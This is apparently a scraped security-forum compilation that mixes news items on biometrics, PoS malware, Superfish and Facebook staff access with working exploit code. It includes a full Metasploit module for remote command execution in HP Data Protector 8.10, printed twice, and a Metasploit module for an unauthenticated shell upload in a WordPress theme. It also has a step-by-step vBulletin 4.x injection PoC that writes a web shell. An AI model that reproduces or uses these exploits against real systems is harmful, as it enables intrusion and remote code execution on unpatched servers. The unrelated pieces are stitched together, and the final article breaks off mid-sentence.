comprised of a system able to learn a user’s unique way of writing by collecting data through subsequent logins. The user is asked to handwrite four characters using their fingertip or pointing device, and the software is able to extrapolate the unique way these letters and numbers are written (length, speed, angle, height). Tests on this system have shown it is actually one of the most accurate systems of recognition available. A research by Tolly Group, a testing and third party verification provider, for example, has found a confidence rating of 99.97% and 27 times greater accuracy than keystroke analysis. In terms of use, the future of biometrics could be in mobile devices and applications for eGovernment, eHealth and eBanking. Through biometric mobile scanning devices, authentication and identification can be brought to the field. It is easy to imagine the possible uses for such systems for other professions, like law enforcement, borders control, medical and emergency services, or even to secure access to government or financial services. The trend is (in order to ensure less possibility of spoofing, replication of physical traits and privacy concerns) to base biometrics systems on the collection of non-physical, dynamic traits. For example, the US military is developing a “cognitive fingerprints” system that might be able to replace the use of faces, fingers and irises as an identification trait. In West Point, in fact, an algorithm is being developed that allows identification through the way individuals interact with their computers; it considers behavioral-based information such as typing speed, writing rhythm and even common spelling mistakes. The algorithm is able to create a unique fingerprint for each user by putting together multiple behavioral and stylometric information that, collectively, are very difficult to reproduce. Once fully implemented, this solution could transfer from military use to civilian, more mundane applications in e-banking, access to services and to secure devices. Will the privacy concern be solved? Not really, as many believe collection of this type of data could easily be embedded in applications commonly used by users and create concerns for widespread classification of users. Privacy vs. Security will be the battle to be fought for these systems’ implementation. Nevertheless, biometric technology could soon become mainstream thanks to the growth of the mobile devices market. Biometrics Research Group, Inc. estimates that the sale of smartphones, in the U.S. only, will grow to 121 million in 2018. Due to this proliferation and to the increased functionalities they offer their users, their analysts believe there will be a strong push toward the integration of biometric technology to replace traditional authentication via pin and password. Biometrics Research Group, Inc. predicted that already in 2014 over 90 million smartphones would be shipped with biometric technology, while Goode Intelligence has forecasted that by 2019 the number of mobile and wearable biometric technology users in the world will reach 5.5 billion. Conclusion Today, biometrics matter more than ever before. In this digital-driven era, more users will come to rely on biometrics as an answer to problems concerning systems security and authorization matters. Although privacy, security and accuracy concerns are still valid, biometrics is still a system that promises the security and ease of use necessary for modern users needing access (even on-the-go) to sensitive data. Biometrics is already hard to forge or spoof, and new advances in technology and new trends like multimodal can really ensure the highest security that sophisticated authentication can give to facilities and computer networks. As scanning devices are made less prone to mistakes and less subjected to sensor error, it will even become easier and faster to implement a biometric security system on a larger scale. This, coupled with its use on mobile devices, will ensure the technology is used for a wide variety of new scopes, including border and law enforcement controls. Although biometrics may be susceptible to false matches, possibly due to scanning and sensor errors, there are ways to minimize this, currently, by utilizing multi-factor options like a password or smartcard combined with biometrics to add an extra layer of security towards authentication. If used together, and not alternatively, the systems are significantly stronger than when used individually. Two-factor authentication is not a new concept. Newest trends, however, see multi-biometrics (the use of different sets of biometric data simultaneously) as a good alternative to increase matching accuracy for identification and verification. Multimodal biometrics systems, which use multiple sensors for data acquisition, offer multiple recognition algorithms and take advantage of each biometric technology while overcoming the limitations of a single technology. Advances in algorithms considering dynamic biometrics that are less linked to physical characteristics but more to behavioral traits is where civilian and military researchers are concentrating their efforts in trying to devise a security system that is, at the same time, foolproof, reliable and quick to use. The call for quicker and more secure authentication systems for mobile devices will also boost the adoption of biometric technology. As biometric devices become more secure and error-free as well as more affordable, the extra security that they can provide, ultimately, will outweigh any shortcoming of this technology as well as problems and concerns on privacy and safety. We might be closer to the end of passwords. References Brecht, D. (2011, January 4). Biometric Devices: They Provide IT Security. Retrieved from Biometrics in IT Security: Questions, Options and Solutions Duncan, G. (2013, March 9). Why haven’t biometrics replaced passwords yet? Retrieved from Why haven't biometrics replaced passwords yet? | Digital Trends FRMC. (2014, September 11). Biometric Signature Authentication: The New Modality of Choice for Safe Guarding EMR Access. Retrieved from Biometric Signature Authentication: The New Modality of Choice for Safe Guarding EMR Access | First Report Managed Care ID Control. (n.d.). Biometric Authentication method Pro’s and Con’s. Retrieved from Biometric Authentication method Pro's and Con's - Keystroke Biometrics - Strong authentication with One Time Password, PKI and Keystroke Recognition Mayhew, S. (2014, August). Special Report: Mobile Biometric Authentication. Retrieved from Special Report: Mobile Biometric Authentication | BiometricUpdate Memon, S. (2014, February 28). Use of Mobile Biometrics Systems for ID Management in eServices. Retrieved from http://www.researchgate.net/profile/Sander_Khowaja/publication/260079452_Use_of_Mobile_Biometrics_Systems_for_ID_Management_in_eServices/links/00b7d5348eed55220b000000.pdf PYMNTS. (2015, January 29). Next in ID Verification: Behavioral Biometrics. Retrieved from http://www.pymnts.com/news/2015/next-in-id-verification-behavioral-biometrics/#.VO8RT010yUl Seals, T. (2015, January 29). US Military to Replace Passwords with “Cognitive Fingerprints”. Retrieved from http://www.infosecurity-magazine.com/news/us-military-passwords-with/ Shahnewaz, M. (2014, December 14). How Mobile Biometrics is Fundamentally Changing Human Identification. Retrieved from http://www.infosecurity-magazine.com/opinions/how-mobile-biometrics-is-changing/ Trader, J. (2014, August 1). The Top 5 Reasons to Deploy Multimodal Biometrics. Retrieved from http://blog.m2sys.com/important-biometric-terms-to-know/top-5-reasons-deploy-multimodal-biometrics/ Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be execute by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is an strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. }, 'Author' => [ 'Christian Ramirez', # POC 'Henoch Barrera', # POC 'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module ], 'References' => [ ['CVE', '2014-2623'], ['OSVDB', '109069'], ['EDB', '34066'], ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Privileged' => true, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'HP Data Protector 8.10 / Windows', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('FILE_NAME', [ false, 'DLL File name to share']), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FOLDER_NAME') deregister_options('FILE_CONTENTS') end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 11 return Exploit::CheckCode::Appears end Exploit::CheckCode::Detected end def peer "#{rhost}:#{rport}" end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def send_pkt(cmd) cmd.gsub!("\\", "\\\\\\\\") pkt = "2\x00" pkt << "\x01\x01\x01\x01\x01\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x01\x00 " pkt << "28\x00" pkt << "\\perl.exe\x00 " pkt << "-esystem('#{cmd}')\x00" connect sock.put([pkt.length].pack('N') + pkt) disconnect end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("#{peer} - Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end def setup super self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" unless file_name =~ /\.dll$/ fail_with(Failure::BadConfig, "FILE_NAME must end with .dll") end end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end

Point-of-sale (PoS) malware has become one of the chief weapons used by attackers to steal credit and debit card data, and now researchers at Trend Micro say they have found yet another threat to add to the list of tools in criminals' toolboxes. The malware is dubbed PwnPOS, and has managed to stay under the radar despite being active since at least 2013. According to Trend Micro, it has been spotted targeting small-to-midsized businesses (SMBs) in Japan, Australia, India, Canada, Germany, Romania and the United States. Trend Micro Threat Analyst Jay Yaneza called PwnPOS an example of malware that's been "able to fly under the radar all these years due to its simple but thoughtful construction." "Technically, there are two components of PwnPOS: 1) the RAM scraper binary, and 2) the binary responsible for data exfiltration," he explained in a blog post. "While the RAM scraper component remains constant, the data exfiltration component has seen several changes – implying that there are two, and possibly distinct, authors. The RAM scraper goes through a process’ memory and dumps the data to the file and the binary uses SMTP for data exfiltration." The malware targets devices running 32-bit versions of Windows XP and Windows 7. One of the keys to the malware's stealth appears to be its ability to remove and add itself from a list of services on the PoS device. "Most incident response and malware-related tools attempt to enumerate auto-run, auto-start or items that have an entry within the services applet in attempt to detect malicious files," Yaneza blogged. "Thus, having parameters that add and remove itself from the list of services allows the attacker to “remain persistent” on the target POS machine when needed, while allowing the malicious file to appear benign as it waits within the %SYSTEM$ directory for the next time it is invoked." PwnPOS enumerates all running processes and searches for card information. Afterward, the stolen data is dumped into a file and ultimately emailed to "a pre-defined mail account via SMTP with SSL and authentication," the researcher blogged. Cybercriminals have increasingly been turning to ready-to-use point-of-sale malware kits. According to security firm Crowdstrike, such kits can cost from as little as tens of dollars to thousands depending upon their complexity. Sursa: securityweek.com

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be execute by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is an strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. }, 'Author' => [ 'Christian Ramirez', # POC 'Henoch Barrera', # POC 'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module ], 'References' => [ ['CVE', '2014-2623'], ['OSVDB', '109069'], ['EDB', '34066'], ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Privileged' => true, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'HP Data Protector 8.10 / Windows', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('FILE_NAME', [ false, 'DLL File name to share']), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS') end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 11 return Exploit::CheckCode::Appears end Exploit::CheckCode::Detected end def peer "#{rhost}:#{rport}" end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def send_pkt(cmd) cmd.gsub!("\\", "\\\\\\\\") pkt = "2\x00" pkt << "\x01\x01\x01\x01\x01\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x01\x00 " pkt << "28\x00" pkt << "\\perl.exe\x00 " pkt << "-esystem('#{cmd}')\x00" connect sock.put([pkt.length].pack('N') + pkt) disconnect end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("#{peer} - Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end def setup super self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" unless file_name =~ /\.dll$/ fail_with(Failure::BadConfig, "FILE_NAME must end with .dll") end end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end Source

Do you know that your Facebook account can be accessed by Facebook engineers and that too without entering your account credentials? Recent details provided by the social network giant show who can access your Facebook account and when. No doubt, Facebook and other big tech companies including Google, Apple and Yahoo! are trying to keep their data out of reach from law enforcement and spies agencies by adopting encrypted communication and end-to-end encryption solutions in near future, but right now they have access to your personal data, and at least few of their employees can access it with one click. Earlier this week, director at the record label Anjunabeats, Paavo Siljamäki, brought attention to this issue by posting a very interesting story on his Facebook wall. During his visit to Facebook office in LA, a Facebook engineer logged into his Facebook account after his permission, but the strange part — they did it without asking him for the password. ACCESS WITHOUT NOTIFICATION Facebook even didn’t notify Siljamäki that someone else accessed his private Facebook profile, as the company does when your Facebook account is accessed from any new device or from a different Geo-location. Siljamäki got in contact with Facebook in order to know how many of Facebook's staff have this kind of 'master' access to anyone's Facebook account and when exactly they can access users’ private data, and also, how would anyone know if his/her Facebook account has been accessed. When the social network giant asked about how the employee got access to user’s Facebook account without entering the account credentials, Facebook issued the following statement: WHO CAN ACCESS MY FACEBOOK ACCOUNT? The company didn’t explain exactly who can access what, but it assured its users that the accounts access is tiered and limited to specific job function. The access to accounts are granted to most employees in order to reply to a customer request for information or error report. In short, the social network giant has a customer service tool that can grant Facebook employees access to a user’s account. Facebook runs two separate monitoring systems that generate weekly reports on suspicious behavior which are then reviewed and analyses by two independent security teams, specifically a selected group of employees. Facebook gives a strict warning when hired employees to use this tool and fired any employee directly who abuse it. So, you need not to worry about Mark Zuckerberg accessing your account, unless you yourself ask Facebook for help with something and have given permission. Source

################################################################################################################# [+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability [+] Discovered By: Dariush Nasirpour (Net.Edit0r) [+] My Homepage: black-hg.org / nasirpour.info [+] Date: [2015 27 February] [+] Vendor Homepage: vBulletin.com [+] Tested on: [vBulletin 4.2.2] [+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg ) ################################################################################################################# Remote Code Injection: +++++++++++++++++++++++++ 1) You Must Register In The vBulletin http://www.victim.com/register.php example:[blackhat] 2) go to your user profile example: [http://black-hg.org/cc/members/blackhat.html] 3) post something in visitor message and record post data with live http header [example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= 4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time] [Now post this with hackbar:] URL: http://black-hg.org/cc/visitormessage.php?do=message [Post data] message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= [And referrer data:] PoC : http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]" 5- Open hackbar and tamper it with taper data: referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]" and submit request. ################################################################################################################ Source

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions. Changes: Multiple bug fixes. Translation updates. Download Home Page

The breaches at Community Health Systems and Anthem, Inc. serve as prime examples of how valuable health care data can be to cybercriminals, but a recent study suggested that these intrusions should not be the only cause for concern for consumers. A study conducted by Timothy Libert, a doctoral student at the University of Pennsylvania's Annenberg School for Communication found that nine out of ten health-related websites expose information regarding visitors' health interests with third parties. The websites included in the study, titled “Privacy Implications of Health Information Seeking on the Web,” are non-profit, educational, commercial, and government-run. Sites such as WebMD, send data to up to 34 separate domains, according to a video by Libert on the study. Using a tool he created that tracks HTTP requests initiated with third-party advertisers and data brokers, Libert was able to analyze 80,000 health-related web pages. According to his findings, 91 percent of the sites initiated requests to third-parties and 70 percent included data on specific “symptoms, treatment, or diseases.” Those on the receiving end of the information included advertisers such as Google – which collected data from 78 percent of the pages, comScore (38 percent) and Facebook (31 percent), in addition to data brokers Experian and Acxiom. The findings suggest that the privacy of users may be at risk seeing as this data can be sold by data brokers legally, which further increases spreads the personal information, thus increasing the risk of compromise. Additionally, thanks to current marketing technology, consumers While the Federal Trade Commission has advocated legislation to regulate the use of tools that many marketers and data brokers use to collect and sell consumer data, there is currently little oversight. “Personal health information – historically protected by Hippocratic Oath – has suddenly become the property of privacy corporations who may sell it to the highest bidder or accidentally misuse it to discriminate against the ill,” Libert said in a release by the university. “As health information seeking has moved online, the privacy of a doctor's office has been traded in for the silent intrusion of behavioral tracking.” Source

Expertii in securitate de la G Data SecurityLabs au analizat adware-ul Superfish. In acest proces, analistii au intalnit o componenta de tehnologie in program, numita SSL Digestor. Acesta foloseste un certificat root care este slab securizat ?i are drepturi extinse pe calculator. SSL Digestor intercepteaza conexiuni HTTPS sigure si le poate descifra. In acest fel, conexiunile care sunt de fapt securizate ar putea fi interceptate si atacate. Acest lucru inseamna ca infractorii cibernetici ar putea folosi un atac man-in-the-middle pentru a spiona sau manipula fluxul de date dintre doi parteneri de comunicare, de exemplu o banca si clientul sau, prin utilizarea unui site bancar fals. Potrivit expertilor G DATA, aceasta parte din program este continuta si in alte produse software. Solutiile de securitate G Data detecteaza software-ul ca Gen: Variant.Adware.Superfish.1 (motor A) si Win32.Riskware.Fishbone.A (Engine . Pentru a elimina certificatul periculos, utilizatorii trebuie sa ia masuri. “Superfish este program adware discutabil. Cu toate acestea, din cauza certificatului slab securizat SSL Digestor, este periculos pentru utilizatori,” explica Ralf Benzmuller, seful G DATA SecurityLabs. ” Utilizatorii afectati ar trebui sa elimine imediat certificatul.” Ce este Superfish? Programul Superfish Visual Discovery este livrat pre-instalat pe mai multe modele de notebook-uri Lenovo. Adware-ul a fost un oaspete nedorit de majoritatea utilizatorilor pentru o lunga perioada de timp, chiar daca, de multe ori aceasta nu este neaparat periculos. Superfish este, cu toate acestea, neobisnuit, deoarece contine o componenta de tehnologie numita SSL Digestor, distribuita de Komodia. Aceasta componenta contine un element care declanseaza problema de securitate actuala – un certificat root foarte slab securizat. Superfish este utilizat chiar si pe dispozitive Android Expertii G Data Security au descoperit doua aplicatii de cautare pentru dispozitive Android care se bazeaza pe Discovery Visual Superfish. Similar cu componenta PC, utilizatorilor le sunt prezentate prin reclame anumite interogari de cautare. Cu toate acestea, aplicatiile nu se bazeaza pe SSL Digestor si nu pun in pericol securitatea protocolului HTTPS. Tehnologia submineaza securitatea HTTPS SSL Digestor instaleaza un certificat care permite programului sa analizeze si sa manipuleze fluxul de date in conexiunile HTTPS. Aceasta componenta este gasita in programe adware pe care utilizatorii le instaleaza involuntar si in programe clasificate a fi troieni de catre furnizorii de securitate IT. Chiar si programe aparent legitime se bazeaza pe aceasta componenta. O verificare rapida prin care puteti afla dac? certificatul root este prezent pe computer se poate face aici: https://www.gdatasoftware.com/securitylabs/quickcheck/fishbone?no_cache=1 Informatii detaliate, plus instructiuni cu privire la modul in care poate fi indepartat certificatul Superfish gasiti pe G DATA SecurityBlog: https://blog.gdatasoftware.com/blog/article/the-power-of-trust-superfish-case-turns-into-a-worst-case-scenario.html -> Sursa <-

G DATA SecurityLabs a investigat o mostra spyware care inregistreaza si transfera intrari de pe tastatura, date clipboard, date de monitorizare si conversatii audio, confirmand astfel dezvaluirile lui Snowden referitoare la o tulpina spyware de provenienta franceza, informatii documentate de catre serviciul de informatii canadian CSEC (Communication Security Establishment Canada). Ziarul francez Le Monde a fost primul care a semnalat existenta acestor documente cu aproape un an in urma. Expertii G Data au publicat detaliile tehnice pentru prima data, in urma analizei malware-ului Babar, care a fost realizata in tandem cu alte agentii de cercetare de securitate internationale. Analistii nu au putut stabili daca aceste servere de control malware au fost in mod deliberat puse in functiune sau au fost compromise. In opinia expertilor, dezvoltarea unui astfel de program necesita investitii substantiale de personal si infrastructura. Nivelul de complexitate al malware-ului sugereaza ca ar proveni de la un serviciu secret. Serviciul de informatii canadian considera ca responsabile de malw“Babar este un program spyware foarte sofisticat care putea fi produs doar de programatori foarte bine pregatiti”, explica Eddy Willems, Security Evangelist G DATA Software AG. ” Babar este proiectat a? functioneze in mod special in retelele companiilor, autoritatilor, organizatiilor si institutelor de cercetare, de unde sustrage date sensibile. Ca rezultat, conversatii audio, cum ar fi cele de pe Skype, de exemplu, pot fi inregistrate. Chiar si un atac directionat asupra utilizatorilor individuali pare posibil. O distributie in masa a unui astfel de malware este, totusi, foarte putin probabil, spune Willems. Istoricul documentelor CSEC In martie 2014, cotidianul francez Le Monde primeste un raport referitor la documentele serviciului de informatii canadian CSEC (Communication Security Establishment Canada), datat din 2011, care a iesit la lumina in timpul dezvaluirilor lui Edward Snowden. Revista germana de stiri, Der Spiegel, a preluat subiectul in ianuarie 2015 si a publicat un continut suplimentar al acestor documente – Operatiunea Snowglobe. Ce este Babar? Babar este un instrument de administrare la distanta (RAT), a carui functie principala este de a spiona date. Potrivit serviciului de informatii canadian, in urma analizei malware-ului EvilBunny din decembrie 2014, Babar a fost si numele de cod al unei operatiuni a unui serviciu secret national numit Snowglobe. Acest lucru arata ca Babar ar putea fi a doua tulpina malware identificata a fi fost conectata la campania spyware Snowglobe. Numele de “Babar” vine de la o serie de carti frantuzesti pentru copii, al carei erou este un elefant. Din cauza similitudinilor dintre ele, expertii in securitate de la G Data sunt convinsi ca cele doua tulpini provin de la aceeasi dezvoltatorii. Informatii tehnice detaliate pot fi gasite pe blogul G Data: https://blog.gdatasoftware.com/blog/article/babar-espionage-software-finally-found-and-put-under-the-microscope.html -> Sursa <-

## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'socket' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress Holding Pattern Theme Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in all versions of the Holding Pattern theme found in the upload_file.php script which contains no session or file validation. It allows unauthenticated users to upload files of any type and subsequently execute PHP scripts in the context of the web server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Borg', # Vulnerability disclosure 'Rob Carr <rob[at]rastating.com>' # Metasploit module ], 'References' => [ ['CVE', '2015-1172'], ['WPVDB', '7784'], ['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html'] ], 'DisclosureDate' => 'Feb 11 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['holding_pattern', {}]], 'DefaultTarget' => 0 )) end def rhost datastore['RHOST'] end def holding_pattern_uploads_url normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/') end def holding_pattern_uploader_url normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php') end def generate_mime_message(payload, payload_name) data = Rex::MIME::Message.new target_ip = IPSocket.getaddress(rhost) field_name = Rex::Text.md5(target_ip) data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"") data end def exploit print_status("#{peer} - Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) print_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => holding_pattern_uploader_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 payload_url = normalize_uri(holding_pattern_uploads_url, payload_name) print_status("#{peer} - Executing the payload at #{payload_url}") register_files_for_cleanup(payload_name) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end end Source

Introduction Last year – dubbed “the Year of the Hack” – saw numerous major cyber attacks against prominent corporations, including JP Morgan bank and Sony Pictures Entertainment. And after Target in 2013, another retailer, Home Depot, suffered a data breach with more than 56 million credit cards stolen. The consequences of these incidents can be devastating in terms of reputation damage and lawsuits that have been filed, charging negligent IT security control. Hackers exposed lots of poorly protected systems, and we should ask ourselves: What’s wrong here? It seems likely that data traffic security and network security have not kept abreast with the technological innovation. This article attempts to gain insight into some of the current issues related to the subject matter, such as proper data encryption, network segmentation, traffic originating from mobile devices, etc. Network Segmentation & Data Encryption Regulatory guidelines that ensure a general standard of compliance focus on traffic encryption for that data that traverse external or public networks, whereas local, inner-core networks are protected by means of logical network segmentation. Isolation of sensitive data on specific internal network repositories and cryptographic segmentation are common security standards today for many institutions that operate with loads of private and confidential information, e.g., banks and hospitals. Network segmentation is possible through technologies like firewalls and routing subnets. On the other hand, the encryption process for data in motion utilizes a large number of forms of encryption ranging from Web-based/HTTPS encryption to SSL-based VPNs. Enhanced Security with Proper Network Segmentation a) Unauthorized network access can be limited through network segmentation or security “zoning”. This mitigation technique will withhold the propagation of a threat, for instance, malicious actors attempting to move across the network. At the same time, segregating the network properly will enable access to those persons who are authorized. Firewalls and VLANs have a function that can partition the network into multiple zones. Multiple layers of control within the network – IT security corporations are more and more interested in dealing with network segmentation errors. But security is not the only problem with configuring proper network segmentation. Beware that while adding more security layers can impede access by cybercriminals, it can also have a negative impact on business dealings if the configuration is not user-friendly enough. Hence, we are obligated to take into consideration other key benefits associated with well-segmented networks, namely, “the ability to contain network problems, improve performance, and reduce congestion.” Diagram 1 “Example of Network Segmentation (Part 1)” Diagram 2 “Example of Network Segmentation (Part 2)” VLAN Network Segmentation and Security Network segmentation with virtual local area networks (VLANs) breaks a network into a number of isolated, smaller networks within the data center. Each of these networks operates as a separate logical broadcast domain. A proper VLAN segmentation can hinder significantly threat actors from accessing the system surface, and simultaneously diminishes their packet-sniffing capabilities. Furthermore, VLANs authorize legitimate users to access only those servers and devices related to their duties. VLANs have a positive unloading effect on network performance because the massive broadcast domains are divided into easily-manoeuvrable small parts. VLANs provide organizational flexibility, allowing administrators to group segmented mini-networks based on categories such as function, application, and project team. Lastly, VLANs can give secure but convenient user mobility to users assigned to a particular VLAN, since they can remain connected to that VLAN irrespective of location. What do the critics say about VLANs? VLANs are unable to enforce reliable control of privileged information because they simply isolate network traffic. It is deemed that they cannot inspect this traffic for threats. Moreover, along with other traditional tools, e.g., internal firewalls, VLANs can be a point of failure as far as security, flexibility, and management is concerned. That is because: “they necessitate physically changing the network topology to create or modify a secure domain; firewall rules to control user access incur time-consuming work-around fixes for authorized users; and security measures such as encrypting internal traffic isn’t always possible.” Next-Generation Networks Software Defined Networking (SDN), Network virtualization (NV), and Network Functions Virtualization (NFV) present an advanced software-based approach to IT virtualization of entire network architecture. A citation from this document illustrates in a few words the basic characteristics of these cutting-edge technologies: Software Defined Networking (SDN) In October 2013, the Open Networking Foundation (ONF) issued a research report in which two potential security challenges related to SDN were addressed: The centralized controller as a “potential single point of attack and failure.” The southbound interface between the controller and data-forwarding devices is “vulnerable to threats that could degrade the availability, performance and integrity of the network.” Measures within the SDN’s architecture: Secure the access to the Controller— protecting the Controller means protecting your SDN; Create a trusted network environment between the SDN Controller, the applications, the devices, which will protect the communications throughout the network; Enforce a robust policy framework to constantly check on the proper functioning of the SDN Controller; Enforce Remediation + Forensics procedures when necessary (i.e., recovery mechanisms, reporting, and analysis). Security outside the architecture can be embedded either in servers, storage and other computing apparatuses. Network Functions Virtualization (NFV) There are two basic security threats for NFVs: 1) A combination of all generic visualization threats; 2) Threats specific to the network function software. However, virtualization gives some complementary security by eliminating or mitigating several kinds of threats typical for the network function software with the help of new elements like centralized security management and hypervisor introspection. For improving the NFV’s security, Andreas Lemke advises users to utilize the following two-pronged combination: “Reducing generic virtualization threats as much as possible by securing the virtualization platform Eliminating as many network function-specific threats as possible by applying NFV-enabled security mechanisms, such as hypervisor-based protection” Drafting a stringent security policy on what is to be transferred from zone to zone is the next step. Accidental access of third parties to your network must be restricted to cases when it is absolutely needed and areas where there is no other information beyond what is required. A zone that contains highly sensitive data should be isolated as much as possible from the rest of the network, but it should not pose an undue burden on the overall data traffic. Tag zones differently depending on the type of data they contain. With regard to the previous point, be sure that a sensitive type of information is not within the reach of an unauthorized third party. Define “good faith”, innocuous communication paths and block suspicious data traffic. Building an enormous matrix of segregated zones may entail drafting a policy for traffic management between zones. Due to security changes over time, frequent changes in the policy have to be made as well so that the policy in question can respond to the present security dynamics of this new network environment. There are standards that can provide guidance on how to set up efficient separation of 